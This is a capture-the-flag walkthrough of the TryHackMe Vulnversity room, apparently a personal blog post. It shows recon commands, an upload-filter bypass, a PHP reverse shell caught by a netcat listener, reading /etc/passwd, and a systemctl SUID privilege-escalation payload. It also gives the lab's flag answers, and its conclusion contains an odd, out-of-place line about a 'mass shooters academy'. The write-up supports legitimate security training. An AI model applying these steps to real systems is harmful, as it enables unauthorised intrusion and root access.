Tryhackme - Vulnversity

Tryhackme – Vulnversity

In this walk through, we will be going through the Vulnversity room from Tryhackme. This room is rated as Easy on the platform and is developed to test our active recon, web app attacks and privilege escalation skills. So, let’s get started without any delay.

Vulnversity

Machine Info:

TitleVulnUniversity
IPaddress10.10.59.9
DifficultyEasy
ObjectiveLearn about active recon, web app attacks and privilege escalation.

Task 1Deploy the machine

Task 1 - Deploy the machine

Task 2 – Reconnaissance

Question 1 – There are many nmap “cheatsheets” online that you can use too.

Done

Question 2 – Scan the box, how many ports are open?

nmap scan

6

Question 3 – What version of the squid proxy is running on the machine?

nmap output

3.5.12

Question 4 – How many ports will nmap scan if the flag -p-400 was used?

400

Question 5 – Using the nmap flag -n what will it not resolve?

DNS

Question 6 – What is the most likely operating system this machine is running?

Ubuntu

Question 7 – What port is the web server running on?

HTTP version

3333

Question 8 – Its important to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important, don’t forget that ports on a higher range might be open so always scan ports after 1000 (even if you leave scanning in the background)

Done

Task 3 – Locating directories using GoBuster

Question 1 – Run Gobuster

gobuster dir -u http://10.10.59.9:3333/ -w ~/Desktop/common.txt

Done

Question 2 – What is the directory that has an upload form page?

gobuster scan

internal directory

Upload functionality

/internal/

Task 4 – Compromise the webserver

Question 1 – What common file type, which you’d want to upload to exploit the server, is blocked? Try a couple to find out.

test.php

Extension not allowed

cat phpext.txt

Burpsuite intercept

Payload Positions

Payload Options - Simple list

 .php

Question 3 – Run this attack, what extension is allowed?

We are going to use a PHP reverse shell as our payload. A reverse shell works by being called on the remote host and forcing this host to make a connection to you. So you’ll listen for incoming connections, upload and have your shell executed which will beacon out to you to control!

  • edit the IP in the pentest monkey reverse shell.
  • change the extenstion to “.phtml”.
  • upload the shell to the web server.
  • setup a netcat listener -> nc -lvnp 1234
  • execute the shell by visiting to the following URL -> http://10.10.59.9:3333/internal/uploads/shell.phtml

shell.phtml

netcat listener

.phtml

Question 4 – What is the name of the user who manages the webserver?

cat /etc/passwd

bill

Question 5 – What is the user flag?

user.txt

8bd7992fbe8a6ad22a63361004cfcedb

Task 5 – Privilege Escalation

Question 1 – On the system, search for all SUID files. What file stands out?

find / -user root -perm -4000 -exec ls -ldb {} \;

find command output

 /bin/systemctl

Question 2 – Its challenge time! We have guided you through this far, are you able to exploit this system further to escalate your privileges and get the final answer? Become root and get the last flag (/root/root.txt)

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
systemctl link $TF
systemctl enable $TF

Resource: https://gtfobins.github.io/gtfobins/systemctl/#suid

priv esc exploit

systemctl start tmp.J18wiFxTNV.service

tmp.J18wiFxTNV.service

root flag

a58ff8579f0a9270368d33a9966c7fd5

Also Read: Tryhackme – Vulnerabilities 101

Conclusion:

Conclusion

So that was “Vulnversity” for you. Let’s sum it up quickly. We started off with a regular nmap scan with version detection, found many ports opened. Out of which, we further enumerated by directory bruteforcing it with gobuster. As a result, found an internal directory with file upload functionality. Bypassing the extension filtering on uploads with the help of the Burpsuite and got our initial access by catching a reverse shell at our netcat listener. At last, escalated our privileges by abusing the misconfigured systemctl binary with the help of GTFObins and got our root flag and an entry in the mass shooters academy. On that note, i will take your leave and will see you in next one, Till then “Hack the Planet”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top